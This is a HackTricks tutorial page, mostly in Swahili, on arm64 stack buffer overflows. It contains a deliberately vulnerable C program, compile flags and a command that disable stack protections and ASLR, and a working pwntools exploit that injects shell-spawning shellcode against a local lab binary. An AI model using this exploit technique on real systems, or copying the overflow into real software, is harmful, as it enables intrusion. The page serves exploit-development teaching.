Stack Shellcode - arm64

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Pata utangulizi wa arm64 katika:

Code

#include <stdio.h>
#include <unistd.h>

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Tengeneza bila pie, canary na nx:

clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack

Hakuna ASLR & Hakuna canary - Stack Overflow

Ili kuzuia ASLR tekeleza:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

Ili kupata kipimo cha bof angalia kiungo hiki.

Dhamira:

from pwn import *

# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)

# Generate shellcode
shellcode = asm(shellcraft.sh())

# Start the process
p = process(binary_name)

# Offset to return address
offset = 72

# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)

# Craft the payload
payload = b'A' * offset + ret_address + shellcode

print("Payload length: "+ str(len(payload)))

# Send the payload
p.send(payload)

# Drop to an interactive session
p.interactive()

Jambo pekee "gumu" kupata hapa ingekuwa anwani katika stack ya kuita. Katika kesi yangu nilitengeneza exploit na anwani iliyopatikana kwa kutumia gdb, lakini kisha wakati wa ku exploit haikufanya kazi (kwa sababu anwani ya stack ilibadilika kidogo).

Nilifungua core file iliyotengenezwa (gdb ./bog ./core) na kuangalia anwani halisi ya mwanzo wa shellcode.